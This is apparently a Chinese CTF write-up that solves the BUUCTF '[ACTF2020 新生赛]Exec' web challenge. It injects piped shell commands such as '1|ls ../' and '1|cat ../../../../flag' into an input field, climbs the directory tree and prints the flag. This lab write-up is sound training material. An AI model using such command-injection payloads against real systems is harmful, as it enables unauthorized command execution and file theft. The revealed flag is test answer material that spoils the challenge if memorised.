BUUCTF 之 [ACTF2020 新生赛]Exec(命令执行漏洞)
- 相关
- 观察
- 进攻
相关
项目 | 内容 |
---|---|
难度 | 简单 |
类型 | WEB |
靶场 | BUUCTF |
坐标 | Exec |
观察
这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。
进攻
构造如下语句显示当前路径中的文件列表:
1|ls
返回结果:
index.php
可以看到并没有我们期望的文件 flag.php。
那就去上一级目录看看,构造语句如下:
1|ls ../
返回结果:
html
localhost
注:
这些文件夹都不需要管它,在 CTF 中,flag 文件往往位于根目录下,但也不要被反套路了。
我们再前往上一级目录看看,构造语句如下:
1|ls ../../
返回结果:
cache
empty
lib
local
lock
log
opt
run
spool
tmp
www
仍旧没有发现 flag.php,但没关系,让我们继续纵深探索:
1|ls ../../../
返回结果:
bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
已经发现 flag 的影子了,让我们换个姿势直捣黄龙:
1|cat ../../../../flag
flag 到手:
flag{10ae5735-4ed8-438d-a682-8a302f6156d6}